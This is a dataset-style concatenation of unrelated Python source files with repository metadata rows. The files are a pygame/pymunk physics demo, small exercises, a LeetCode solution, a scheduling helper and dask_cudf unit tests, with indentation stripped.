s.collision_type = 1
space.add(*static)
def pre_solve(arb, space, data):
s = arb.shapes[0]
space.remove(s.body, s)
return False
space.add_collision_handler(0, 1).pre_solve = pre_solve
terrain_surface = pygame.Surface((600, 600))
terrain_surface.fill(pygame.Color("white"))
color = pygame.color.THECOLORS["pink"]
pygame.draw.circle(terrain_surface, color, (450, 120), 100)
generate_geometry(terrain_surface, space)
for x in range(25):
mass = 1
moment = pymunk.moment_for_circle(mass, 0, 10)
body = pymunk.Body(mass, moment)
body.position = 450, 120
shape = pymunk.Circle(body, 10)
shape.friction = 0.5
space.add(body, shape)
draw_options = pymunk.pygame_util.DrawOptions(screen)
pymunk.pygame_util.positive_y_is_up = False
fps = 60
while True:
for event in pygame.event.get():
if (
event.type == pygame.QUIT
or event.type == pygame.KEYDOWN
and (event.key in [pygame.K_ESCAPE, pygame.K_q])
):
sys.exit(0)
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:
pass
elif event.type == pygame.KEYDOWN and event.key == pygame.K_r:
terrain_surface.fill(pygame.Color("white"))
for s in space.shapes:
if hasattr(s, "generated") and s.generated:
space.remove(s)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_g:
generate_geometry(terrain_surface, space)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:
pygame.image.save(screen, "deformable.png")
if pygame.mouse.get_pressed()[0]:
if pygame.key.get_mods() & pygame.KMOD_SHIFT:
mass = 1
moment = pymunk.moment_for_circle(mass, 0, 10)
body = pymunk.Body(mass, moment)
body.position = pygame.mouse.get_pos()
shape = pymunk.Circle(body, 10)
shape.friction = 0.5
space.add(body, shape)
else:
color = pygame.Color("pink")
pos = pygame.mouse.get_pos()
pygame.draw.circle(terrain_surface, color, pos, 25)
space.step(1.0 / fps)
screen.fill(pygame.Color("white"))
screen.blit(terrain_surface, (0, 0))
space.debug_draw(draw_options)
draw_helptext(screen)
pygame.display.flip()
clock.tick(fps)
pygame.display.set_caption("fps: " + str(clock.get_fps()))
if __name__ == "__main__":
sys.exit(main())
| 30.677419 | 76 | 0.569506 |
ace96b29847d94e0ad359533ffc8ada9431b620b | 140 | py | Python | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | modules/import_specific_attributes.py | magicalcarpet/the_complete_python_course | 0ac0c5015a93607d7d29258ac0a3fc38dda81bd2 | [
"MIT"
] | null | null | null | from calculator import creator, add, subtract
from math import sqrt
print(creator)
print(add(2, 5))
print(subtract(10, 3))
print(sqrt(49))
| 17.5 | 45 | 0.75 |
ace96b876a6dad71c43c5a32c2f87fb6d2f15ad0 | 232 | py | Python | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
] | null | null | null | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
] | null | null | null | Intro/Land of Logic/validTime.py | shanemichaelarcaro/codesignal | 69b0460dbc163091dc115634bbb730da5caf65a9 | [
"MIT"
] | null | null | null | def validTime(time):
time = time.split(":")
return 0 <= int(time[0]) <= 23 and 1 <= int(time[1]) <= 59
print(validTime("13:58")) # => True
print(validTime("25:51")) # => False
print(validTime("02:78")) # => False
| 19.333333 | 62 | 0.551724 |
ace96da63e730c6828460fced8737fd5074392b8 | 612 | py | Python | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 7 | 2020-10-08T12:54:47.000Z | 2021-09-19T11:15:05.000Z | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 8 | 2020-09-30T11:38:54.000Z | 2021-02-25T01:12:31.000Z | mdgen/constants.py | saisiddhant12/python-random-markdown-generator | a1a581beddb26edabb3173f60e7317471711c2d3 | [
"Apache-2.0"
] | 9 | 2020-10-01T06:28:45.000Z | 2021-06-05T14:58:33.000Z | from os import linesep
MARKDOWN_HEADER = '#'
MARKDOWN_HEADER_ALT = '-'
LINESEPARATOR = linesep
INDENTATION = '\t'
MARKDOWN_BOLD = '**'
MARKDOWN_ITALIC = '*'
MARKDOWN_ITALIC_ALT = '_'
MARKDOWN_HORIZONTAL_RULE_HYPHENS = '---'
MARKDOWN_HORIZONTAL_RULE_ASTERISKS = '***'
MARKDOWN_HORIZONTAL_RULE_UNDERSCORES = '___'
MARKDOWN_UNORDERED_LISTS_ASTERISKS = '*'
MARKDOWN_UNORDERED_LISTS_MINUS = '-'
MARKDOWN_UNORDERED_LISTS_PLUS = '+'
MARKDOWN_TABLE_COL_SEPARATOR = '|'
MARKDOWN_TABLE_ROW_SEPARATOR = '-'
MARKDOWN_COMMENT_OPEN = '<!--'
MARKDOWN_COMMENT_CLOSE = '-->'
MARKDOWN_CODEBLOCK = '```'
MARKDOWN_BLOCKQUOTE = '>'
| 27.818182 | 44 | 0.763072 |
ace96e7432f8b214a9afe7b7204789ba560bc72c | 1,388 | py | Python | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | problemset/540.py | frankpiva/leetcode | 85540af1fd72ad9e92c5a6ad253b1aaeec5065d9 | [
"MIT"
] | null | null | null | """
540. Single Element in a Sorted Array
Medium
3934
98
Add to List
Share
You are given a sorted array consisting of only integers where every element appears exactly twice, except for one element which appears exactly once.
Return the single element that appears only once.
Your solution must run in O(log n) time and O(1) space.
Example 1:
Input: nums = [1,1,2,3,3,4,4,8,8]
Output: 2
Example 2:
Input: nums = [3,3,7,7,10,11,11]
Output: 10
Constraints:
1 <= nums.length <= 105
0 <= nums[i] <= 105
"""
class Solution:
def singleNonDuplicate(self, nums: List[int]) -> int:
left = 0
right = len(nums) - 1
# start at both ends and find the midpoint
while left < right:
mid = right - (right - left) // 2
# if the remainder in each side is even, offset needs to be the same
if mid % 2 == 0:
if nums[mid] == nums[mid - 1]:
right = mid - 2
else:
left = mid
# else the remainder in each side is odd, offset needs to be different
else:
if nums[mid] == nums[mid - 1]:
left = mid + 1
else:
right = mid - 1
# adjust for overshoot
if left == right:
return nums[left]
else:
return nums[mid + 1]
| 22.754098 | 150 | 0.542507 |
ace96fbb8e27d0e758d72d5c02732c9ee286721f | 2,913 | py | Python | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | schedulemanager/schedules/customFunctions.py | NumaKarolinski/schedule_web_app | 260f9203787a3273094f2149ac6e2adc7d46abcf | [
"MIT"
] | null | null | null | import math as m
import numpy as np
import random as r
def cpdf(sigmas_from_bound):
return 0.5 * (1 + m.erf(sigmas_from_bound / m.sqrt(2)))
def generate_gaussian(nn_n_1, nn_n_2, n, n_more, n_less, available):
if nn_n_1:
if n == n_less:
lower_bound = n_less
else:
lower_bound = 0
else:
lower_bound = n_less
if nn_n_2:
if n == n_more:
upper_bound = n_more
else:
upper_bound = available
else:
if available < n_more:
upper_bound = available
else:
upper_bound = n_more
# both values are in minutes, they are the upper and lower sigma
# for the piecewise Gaussian (left and right half of Gaussian)
# lower_sigma_in_minutes is negative because it's less than the mean
# n_less and n_more are -2*sigma_lower and 2*sigma_upper,
# respectively, so l_b_s_f_m <= 0, and u_b_s_f_m >= 0
lower_sigma_in_minutes = (n_less - n) / 2
upper_sigma_in_minutes = (n_more - n) / 2
if lower_bound == n and upper_bound == n:
return n
elif upper_bound == n:
upper_bound_sigmas_from_mean = 0
lower_bound_sigmas_from_mean = (
n - lower_bound) / lower_sigma_in_minutes
threshold = 1
fl = 1
fm = 0
elif lower_bound == n:
upper_bound_sigmas_from_mean = (
upper_bound - n) / upper_sigma_in_minutes
lower_bound_sigmas_from_mean = 0
threshold = 1
fl = 0
fm = 1
else:
lower_bound_sigmas_from_mean = (
n - lower_bound) / lower_sigma_in_minutes
upper_bound_sigmas_from_mean = (
upper_bound - n) / upper_sigma_in_minutes
fl = 0.5 - cpdf(lower_bound_sigmas_from_mean)
fm = cpdf(upper_bound_sigmas_from_mean) - 0.5
if (-1 * lower_bound_sigmas_from_mean) <= upper_bound_sigmas_from_mean:
threshold = fl / fm
else:
threshold = fm / fl
valid_value = False
while not valid_value:
ro = r.random()
roo = r.random()
rooo = r.random()
if (roo < 0.25) or (roo >= 0.75):
if upper_bound == n:
pass
else:
if (fm > fl and rooo <= threshold) or (fm <= fl):
x_m = upper_sigma_in_minutes * \
np.sqrt(2 * (-np.log(1 - ro))) * \
np.cos(2 * np.pi * roo) + n
if x_m < upper_bound:
return x_m
else:
if lower_bound == n:
pass
if (fm < fl and rooo <= threshold) or (fm >= fl):
x_l = -lower_sigma_in_minutes * \
np.sqrt(2 * (-np.log(1 - ro))) * \
np.cos(2 * np.pi * roo) + n
if x_l > lower_bound:
return x_l
| 28.009615 | 79 | 0.534157 |
ace9701b67736731ac85173437e736fb453a33b8 | 24,054 | py | Python | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 4,012 | 2018-10-29T00:11:19.000Z | 2022-03-31T19:20:19.000Z | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 9,865 | 2018-10-29T12:52:07.000Z | 2022-03-31T23:09:21.000Z | python/dask_cudf/dask_cudf/tests/test_core.py | gdaisukesuzuki/cudf | aa5c8b686b1513dba7bce168200c1259f1eda908 | [
"Apache-2.0"
] | 588 | 2018-10-29T05:52:44.000Z | 2022-03-28T06:13:09.000Z | # Copyright (c) 2021, NVIDIA CORPORATION.
import random
import cupy as cp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.core import make_meta as dask_make_meta, meta_nonempty
from dask.utils import M
import cudf
import dask_cudf as dgd
def test_from_cudf():
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 5, size=10000),
"y": np.random.normal(size=10000),
}
)
gdf = cudf.DataFrame.from_pandas(df)
# Test simple around to/from dask
ingested = dd.from_pandas(gdf, npartitions=2)
dd.assert_eq(ingested, df)
# Test conversion to dask.dataframe
ddf = ingested.to_dask_dataframe()
dd.assert_eq(ddf, df)
def test_from_cudf_multiindex_raises():
df = cudf.DataFrame({"x": list("abc"), "y": [1, 2, 3], "z": [1, 2, 3]})
with pytest.raises(NotImplementedError):
# dask_cudf does not support MultiIndex yet
dgd.from_cudf(df.set_index(["x", "y"]))
def test_from_cudf_with_generic_idx():
cdf = cudf.DataFrame(
{
"a": list(range(20)),
"b": list(reversed(range(20))),
"c": list(range(20)),
}
)
ddf = dgd.from_cudf(cdf, npartitions=2)
assert isinstance(ddf.index.compute(), cudf.RangeIndex)
dd.assert_eq(ddf.loc[1:2, ["a"]], cdf.loc[1:2, ["a"]])
def _fragmented_gdf(df, nsplit):
n = len(df)
# Split dataframe in *nsplit*
subdivsize = n // nsplit
starts = [i * subdivsize for i in range(nsplit)]
ends = starts[1:] + [None]
frags = [df[s:e] for s, e in zip(starts, ends)]
return frags
def test_query():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=10), "y": np.random.normal(size=10)}
)
gdf = cudf.DataFrame.from_pandas(df)
expr = "x > 2"
dd.assert_eq(gdf.query(expr), df.query(expr))
queried = dd.from_pandas(gdf, npartitions=2).query(expr)
got = queried
expect = gdf.query(expr)
dd.assert_eq(got, expect)
def test_query_local_dict():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=10), "y": np.random.normal(size=10)}
)
gdf = cudf.DataFrame.from_pandas(df)
ddf = dgd.from_cudf(gdf, npartitions=2)
val = 2
gdf_queried = gdf.query("x > @val")
ddf_queried = ddf.query("x > @val", local_dict={"val": val})
dd.assert_eq(gdf_queried, ddf_queried)
def test_head():
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 5, size=100),
"y": np.random.normal(size=100),
}
)
gdf = cudf.DataFrame.from_pandas(df)
dgf = dd.from_pandas(gdf, npartitions=2)
dd.assert_eq(dgf.head(), df.head())
def test_from_dask_dataframe():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
ddf = dd.from_pandas(df, npartitions=2)
dgdf = ddf.map_partitions(cudf.from_pandas)
got = dgdf.compute().to_pandas()
expect = df
dd.assert_eq(got, expect)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
@pytest.mark.parametrize("divisions", [None, "quantile"])
def test_set_index(nelem, divisions):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
# Use unique index range as the sort may not be stable-ordering
x = np.arange(nelem)
np.random.shuffle(x)
df = pd.DataFrame(
{"x": x, "y": np.random.randint(0, nelem, size=nelem)}
)
ddf = dd.from_pandas(df, npartitions=2)
dgdf = ddf.map_partitions(cudf.from_pandas)
expect = ddf.set_index("x")
got = dgdf.set_index("x", divisions=divisions)
dd.assert_eq(expect, got, check_index=False, check_divisions=False)
@pytest.mark.parametrize("by", ["a", "b"])
@pytest.mark.parametrize("nelem", [10, 500])
@pytest.mark.parametrize("nparts", [1, 10])
def test_set_index_quantile(nelem, nparts, by):
df = cudf.DataFrame()
df["a"] = np.ascontiguousarray(np.arange(nelem)[::-1])
df["b"] = np.random.choice(cudf.datasets.names, size=nelem)
ddf = dd.from_pandas(df, npartitions=nparts)
got = ddf.set_index(by, divisions="quantile")
expect = df.sort_values(by=by).set_index(by)
dd.assert_eq(got, expect)
def assert_frame_equal_by_index_group(expect, got):
assert sorted(expect.columns) == sorted(got.columns)
assert sorted(set(got.index)) == sorted(set(expect.index))
# Note the set_index sort is not stable,
unique_values = sorted(set(got.index))
for iv in unique_values:
sr_expect = expect.loc[[iv]]
sr_got = got.loc[[iv]]
for k in expect.columns:
# Sort each column before we compare them
sorted_expect = sr_expect.sort_values(k)[k]
sorted_got = sr_got.sort_values(k)[k]
np.testing.assert_array_equal(sorted_expect, sorted_got)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
def test_set_index_2(nelem):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
df = pd.DataFrame(
{
"x": 100 + np.random.randint(0, nelem // 2, size=nelem),
"y": np.random.normal(size=nelem),
}
)
expect = df.set_index("x").sort_index()
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=4)
res = dgf.set_index("x") # sort by default
got = res.compute().to_pandas()
assert_frame_equal_by_index_group(expect, got)
@pytest.mark.xfail(reason="dask's index name '__dask_cudf.index' is correct")
def test_set_index_w_series():
with dask.config.set(scheduler="single-threaded"):
nelem = 20
np.random.seed(0)
df = pd.DataFrame(
{
"x": 100 + np.random.randint(0, nelem // 2, size=nelem),
"y": np.random.normal(size=nelem),
}
)
expect = df.set_index(df.x).sort_index()
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=4)
res = dgf.set_index(dgf.x) # sort by default
got = res.compute().to_pandas()
dd.assert_eq(expect, got)
def test_set_index_sorted():
with dask.config.set(scheduler="single-threaded"):
df1 = pd.DataFrame({"val": [4, 3, 2, 1, 0], "id": [0, 1, 3, 5, 7]})
ddf1 = dd.from_pandas(df1, npartitions=2)
gdf1 = cudf.from_pandas(df1)
gddf1 = dgd.from_cudf(gdf1, npartitions=2)
expect = ddf1.set_index("id", sorted=True)
got = gddf1.set_index("id", sorted=True)
dd.assert_eq(expect, got)
with pytest.raises(ValueError):
# Cannot set `sorted=True` for non-sorted column
gddf1.set_index("val", sorted=True)
@pytest.mark.parametrize("nelem", [10, 200, 1333])
@pytest.mark.parametrize("index", [None, "myindex"])
def test_rearrange_by_divisions(nelem, index):
with dask.config.set(scheduler="single-threaded"):
np.random.seed(0)
df = pd.DataFrame(
{
"x": np.random.randint(0, 20, size=nelem),
"y": np.random.normal(size=nelem),
"z": np.random.choice(["dog", "cat", "bird"], nelem),
}
)
df["z"] = df["z"].astype("category")
ddf1 = dd.from_pandas(df, npartitions=4)
gdf1 = dgd.from_cudf(cudf.DataFrame.from_pandas(df), npartitions=4)
ddf1.index.name = index
gdf1.index.name = index
divisions = (0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20)
expect = dd.shuffle.rearrange_by_divisions(
ddf1, "x", divisions=divisions, shuffle="tasks"
)
result = dd.shuffle.rearrange_by_divisions(
gdf1, "x", divisions=divisions, shuffle="tasks"
)
dd.assert_eq(expect, result)
def test_assign():
np.random.seed(0)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
pdcol = pd.Series(np.arange(20) + 1000)
newcol = dd.from_pandas(cudf.Series(pdcol), npartitions=dgf.npartitions)
got = dgf.assign(z=newcol)
dd.assert_eq(got.loc[:, ["x", "y"]], df)
np.testing.assert_array_equal(got["z"].compute().to_array(), pdcol)
@pytest.mark.parametrize("data_type", ["int8", "int16", "int32", "int64"])
def test_setitem_scalar_integer(data_type):
np.random.seed(0)
scalar = np.random.randint(0, 100, dtype=data_type)
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
@pytest.mark.parametrize("data_type", ["float32", "float64"])
def test_setitem_scalar_float(data_type):
np.random.seed(0)
scalar = np.random.randn(1).astype(data_type)[0]
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
def test_setitem_scalar_datetime():
np.random.seed(0)
scalar = np.int64(np.random.randint(0, 100)).astype("datetime64[ms]")
df = pd.DataFrame(
{"x": np.random.randint(0, 5, size=20), "y": np.random.normal(size=20)}
)
dgf = dd.from_pandas(cudf.DataFrame.from_pandas(df), npartitions=2)
df["z"] = scalar
dgf["z"] = scalar
got = dgf.compute().to_pandas()
np.testing.assert_array_equal(got["z"], df["z"])
@pytest.mark.parametrize(
"func",
[
lambda: pd._testing.makeDataFrame().reset_index(),
pd._testing.makeDataFrame,
pd._testing.makeMixedDataFrame,
pd._testing.makeObjectSeries,
pd._testing.makeTimeSeries,
],
)
def test_repr(func):
pdf = func()
try:
gdf = cudf.from_pandas(pdf)
except Exception:
raise pytest.xfail()
# gddf = dd.from_pandas(gdf, npartitions=3, sort=False) # TODO
gddf = dd.from_pandas(gdf, npartitions=3, sort=False)
assert repr(gddf)
if hasattr(pdf, "_repr_html_"):
assert gddf._repr_html_()
@pytest.mark.skip(reason="datetime indexes not fully supported in cudf")
@pytest.mark.parametrize("start", ["1d", "5d", "1w", "12h"])
@pytest.mark.parametrize("stop", ["1d", "3d", "8h"])
def test_repartition_timeseries(start, stop):
# This test is currently absurdly slow. It should not be unskipped without
# slimming it down.
pdf = dask.datasets.timeseries(
"2000-01-01",
"2000-01-31",
freq="1s",
partition_freq=start,
dtypes={"x": int, "y": float},
)
gdf = pdf.map_partitions(cudf.DataFrame.from_pandas)
a = pdf.repartition(freq=stop)
b = gdf.repartition(freq=stop)
assert a.divisions == b.divisions
dd.utils.assert_eq(a, b)
@pytest.mark.parametrize("start", [1, 2, 5])
@pytest.mark.parametrize("stop", [1, 3, 7])
def test_repartition_simple_divisions(start, stop):
pdf = pd.DataFrame({"x": range(100)})
pdf = dd.from_pandas(pdf, npartitions=start)
gdf = pdf.map_partitions(cudf.DataFrame.from_pandas)
a = pdf.repartition(npartitions=stop)
b = gdf.repartition(npartitions=stop)
assert a.divisions == b.divisions
dd.assert_eq(a, b)
@pytest.mark.parametrize("npartitions", [2, 17, 20])
def test_repartition_hash_staged(npartitions):
by = ["b"]
datarange = 35
size = 100
gdf = cudf.DataFrame(
{
"a": np.arange(size, dtype="int64"),
"b": np.random.randint(datarange, size=size),
}
)
# WARNING: Specific npartitions-max_branch combination
# was specifically chosen to cover changes in #4676
npartitions_initial = 17
ddf = dgd.from_cudf(gdf, npartitions=npartitions_initial)
ddf_new = ddf.shuffle(
on=by, ignore_index=True, npartitions=npartitions, max_branch=4
)
# Make sure we are getting a dask_cudf dataframe
assert type(ddf_new) == type(ddf)
# Check that the length was preserved
assert len(ddf_new) == len(ddf)
# Check that the partitions have unique keys,
# and that the key values are preserved
expect_unique = gdf[by].drop_duplicates().sort_values(by)
got_unique = cudf.concat(
[
part[by].compute().drop_duplicates()
for part in ddf_new[by].partitions
],
ignore_index=True,
).sort_values(by)
dd.assert_eq(got_unique, expect_unique, check_index=False)
@pytest.mark.parametrize("by", [["b"], ["c"], ["d"], ["b", "c"]])
@pytest.mark.parametrize("npartitions", [3, 4, 5])
@pytest.mark.parametrize("max_branch", [3, 32])
def test_repartition_hash(by, npartitions, max_branch):
npartitions_i = 4
datarange = 26
size = 100
gdf = cudf.DataFrame(
{
"a": np.arange(0, stop=size, dtype="int64"),
"b": np.random.randint(datarange, size=size),
"c": np.random.choice(list("abcdefgh"), size=size),
"d": np.random.choice(np.arange(26), size=size),
}
)
gdf.d = gdf.d.astype("datetime64[ms]")
ddf = dgd.from_cudf(gdf, npartitions=npartitions_i)
ddf_new = ddf.shuffle(
on=by,
ignore_index=True,
npartitions=npartitions,
max_branch=max_branch,
)
# Check that the length was preserved
assert len(ddf_new) == len(ddf)
# Check that the partitions have unique keys,
# and that the key values are preserved
expect_unique = gdf[by].drop_duplicates().sort_values(by)
got_unique = cudf.concat(
[
part[by].compute().drop_duplicates()
for part in ddf_new[by].partitions
],
ignore_index=True,
).sort_values(by)
dd.assert_eq(got_unique, expect_unique, check_index=False)
@pytest.fixture
def pdf():
return pd.DataFrame(
{"x": [1, 2, 3, 4, 5, 6], "y": [11.0, 12.0, 13.0, 14.0, 15.0, 16.0]}
)
@pytest.fixture
def gdf(pdf):
return cudf.from_pandas(pdf)
@pytest.fixture
def ddf(pdf):
return dd.from_pandas(pdf, npartitions=3)
@pytest.fixture
def gddf(gdf):
return dd.from_pandas(gdf, npartitions=3)
@pytest.mark.parametrize(
"func",
[
lambda df: df + 1,
lambda df: df.index,
lambda df: df.x.sum(),
lambda df: df.x.astype(float),
lambda df: df.assign(z=df.x.astype("int")),
],
)
def test_unary_ops(func, gdf, gddf):
p = func(gdf)
g = func(gddf)
# Fixed in https://github.com/dask/dask/pull/4657
if isinstance(p, cudf.Index):
from packaging import version
if version.parse(dask.__version__) < version.parse("1.1.6"):
pytest.skip(
"dask.dataframe assert_eq index check hardcoded to "
"pandas prior to 1.1.6 release"
)
dd.assert_eq(p, g, check_names=False)
@pytest.mark.parametrize("series", [True, False])
def test_concat(gdf, gddf, series):
if series:
gdf = gdf.x
gddf = gddf.x
a = (
cudf.concat([gdf, gdf + 1, gdf + 2])
.sort_values()
.reset_index(drop=True)
)
b = (
dd.concat([gddf, gddf + 1, gddf + 2], interleave_partitions=True)
.compute()
.sort_values()
.reset_index(drop=True)
)
else:
a = (
cudf.concat([gdf, gdf + 1, gdf + 2])
.sort_values("x")
.reset_index(drop=True)
)
b = (
dd.concat([gddf, gddf + 1, gddf + 2], interleave_partitions=True)
.compute()
.sort_values("x")
.reset_index(drop=True)
)
dd.assert_eq(a, b)
def test_boolean_index(gdf, gddf):
gdf2 = gdf[gdf.x > 2]
gddf2 = gddf[gddf.x > 2]
dd.assert_eq(gdf2, gddf2)
def test_drop(gdf, gddf):
gdf2 = gdf.drop(columns="x")
gddf2 = gddf.drop(columns="x").compute()
dd.assert_eq(gdf2, gddf2)
@pytest.mark.parametrize("deep", [True, False])
@pytest.mark.parametrize("index", [True, False])
def test_memory_usage(gdf, gddf, index, deep):
dd.assert_eq(
gdf.memory_usage(deep=deep, index=index),
gddf.memory_usage(deep=deep, index=index),
)
@pytest.mark.parametrize("index", [True, False])
def test_hash_object_dispatch(index):
obj = cudf.DataFrame(
{"x": ["a", "b", "c"], "y": [1, 2, 3], "z": [1, 1, 0]}, index=[2, 4, 6]
)
# DataFrame
result = dd.core.hash_object_dispatch(obj, index=index)
expected = dgd.backends.hash_object_cudf(obj, index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
# Series
result = dd.core.hash_object_dispatch(obj["x"], index=index)
expected = dgd.backends.hash_object_cudf(obj["x"], index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
# DataFrame with MultiIndex
obj_multi = obj.set_index(["x", "z"], drop=True)
result = dd.core.hash_object_dispatch(obj_multi, index=index)
expected = dgd.backends.hash_object_cudf(obj_multi, index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
@pytest.mark.parametrize(
"index",
[
"int8",
"int32",
"int64",
"float64",
"strings",
"cats",
"time_s",
"time_ms",
"time_ns",
["int32", "int64"],
["int8", "float64", "strings"],
["cats", "int8", "float64"],
["time_ms", "cats"],
],
)
def test_make_meta_backends(index):
dtypes = ["int8", "int32", "int64", "float64"]
df = cudf.DataFrame(
{dt: np.arange(start=0, stop=3, dtype=dt) for dt in dtypes}
)
df["strings"] = ["cat", "dog", "fish"]
df["cats"] = df["strings"].astype("category")
df["time_s"] = np.array(
["2018-10-07", "2018-10-08", "2018-10-09"], dtype="datetime64[s]"
)
df["time_ms"] = df["time_s"].astype("datetime64[ms]")
df["time_ns"] = df["time_s"].astype("datetime64[ns]")
df = df.set_index(index)
# Check "empty" metadata types
chk_meta = dask_make_meta(df)
dd.assert_eq(chk_meta.dtypes, df.dtypes)
# Check "non-empty" metadata types
chk_meta_nonempty = meta_nonempty(df)
dd.assert_eq(chk_meta.dtypes, chk_meta_nonempty.dtypes)
# Check dask code path if not MultiIndex
if not isinstance(df.index, cudf.MultiIndex):
ddf = dgd.from_cudf(df, npartitions=1)
# Check "empty" metadata types
dd.assert_eq(ddf._meta.dtypes, df.dtypes)
# Check "non-empty" metadata types
dd.assert_eq(ddf._meta.dtypes, ddf._meta_nonempty.dtypes)
@pytest.mark.parametrize(
"data",
[
pd.Series([], dtype="float64"),
pd.DataFrame({"abc": [], "xyz": []}),
pd.Series([1, 2, 10, 11]),
pd.DataFrame({"abc": [1, 2, 10, 11], "xyz": [100, 12, 120, 1]}),
],
)
def test_dataframe_series_replace(data):
pdf = data.copy()
gdf = cudf.from_pandas(pdf)
ddf = dgd.from_cudf(gdf, npartitions=5)
dd.assert_eq(ddf.replace(1, 2), pdf.replace(1, 2))
def test_dataframe_assign_col():
df = cudf.DataFrame(list(range(100)))
pdf = pd.DataFrame(list(range(100)))
ddf = dgd.from_cudf(df, npartitions=4)
ddf["fold"] = 0
ddf["fold"] = ddf["fold"].map_partitions(
lambda cudf_df: cp.random.randint(0, 4, len(cudf_df))
)
pddf = dd.from_pandas(pdf, npartitions=4)
pddf["fold"] = 0
pddf["fold"] = pddf["fold"].map_partitions(
lambda p_df: np.random.randint(0, 4, len(p_df))
)
dd.assert_eq(ddf[0], pddf[0])
dd.assert_eq(len(ddf["fold"]), len(pddf["fold"]))
def test_dataframe_set_index():
random.seed(0)
df = cudf.datasets.randomdata(26, dtypes={"a": float, "b": int})
df["str"] = list("abcdefghijklmnopqrstuvwxyz")
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
ddf = ddf.set_index("str")
pddf = dd.from_pandas(pdf, npartitions=4)
pddf = pddf.set_index("str")
from cudf.testing._utils import assert_eq
assert_eq(ddf.compute(), pddf.compute())
def test_series_describe():
random.seed(0)
sr = cudf.datasets.randomdata(20)["x"]
psr = sr.to_pandas()
dsr = dgd.from_cudf(sr, npartitions=4)
pdsr = dd.from_pandas(psr, npartitions=4)
dd.assert_eq(
dsr.describe(), pdsr.describe(), check_less_precise=3,
)
def test_dataframe_describe():
random.seed(0)
df = cudf.datasets.randomdata(20)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(
ddf.describe(), pddf.describe(), check_exact=False, atol=0.0001
)
def test_zero_std_describe():
num = 84886781
df = cudf.DataFrame(
{
"x": np.full((20,), num, dtype=np.float64),
"y": np.full((20,), num, dtype=np.float64),
}
)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(ddf.describe(), pddf.describe(), check_less_precise=3)
def test_large_numbers_var():
num = 8488678001
df = cudf.DataFrame(
{
"x": np.arange(num, num + 1000, dtype=np.float64),
"y": np.arange(num, num + 1000, dtype=np.float64),
}
)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(ddf.var(), pddf.var(), check_less_precise=3)
def test_index_map_partitions():
# https://github.com/rapidsai/cudf/issues/6738
ddf = dd.from_pandas(pd.DataFrame({"a": range(10)}), npartitions=2)
